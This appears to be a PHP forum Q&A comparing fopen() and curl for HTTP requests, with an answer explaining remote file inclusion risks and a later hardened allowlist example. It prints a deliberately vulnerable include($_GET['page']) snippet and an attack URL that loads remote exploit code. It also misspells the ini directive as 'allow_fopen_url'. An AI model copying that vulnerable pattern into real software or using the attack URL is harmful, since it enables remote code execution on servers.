Problem description
I'm writing some code that will need to speak to a web service over HTTP(s). In the past I've used the curl library. Recently, I noticed that I can simply use fopen() to access a remote URL and it seems far simpler.
Curl seems to be much more configurable, having a plethora of options. Beyond that configurability, does it matter which method is used? If so, which is better and why?
fopen() will only open remote URLs if allow_fopen_url is enabled in php.ini. However in versions prior to 5.2.0, this was exceedingly dangerous because the include function would also download and parse PHP code from remote sites. A naive coder could easily be caught out with code like:
<?php
$page = $_GET['page'];
include($page);
?>
at which point an attacker just has to ask for http://example.com/script.php?page=http://example.net/my_exploit_script to execute their own code on the system and introduce an exploit. Unfortunately the default value for allow_fopen_url is 'on'.
Fortunately, since 5.2.0 there's a separate setting (which should default to 'off') called allow_url_include which prevents include from downloading remote code.
Personally, if you've got the option to use Curl, use that rather than fopen.
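A hardened counterpart to the include($page) snippet above, as an added example that is not part of the original answer: the request value only selects a key in a fixed allowlist, and the script logs a warning when allow_url_include is on. The page names, the pages/ directory and PHP 8 are assumptions; in php.ini the directive that gates remote fopen() is spelled allow_url_fopen.

```php
<?php
// Added example: hardened form of include($_GET['page']).
// PAGES and the pages/ directory are hypothetical names for illustration.

const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Map a request parameter to a local file, or return null.
 * The user's value is only ever used as an array key, so a URL
 * (http://, ftp://, php://, data:) or a ../ path never reaches include.
 */
function resolve_page(mixed $requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null; // also rejects ?page[]=x, which arrives as an array
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() is false for missing files; also confirm containment
    // in case an allowlisted file is a symlink leading elsewhere.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

/** Report the two ini settings that control remote URL wrappers. */
function url_wrapper_settings(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

if (url_wrapper_settings()['allow_url_include']) {
    error_log('allow_url_include is enabled: include/require can load remote code');
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```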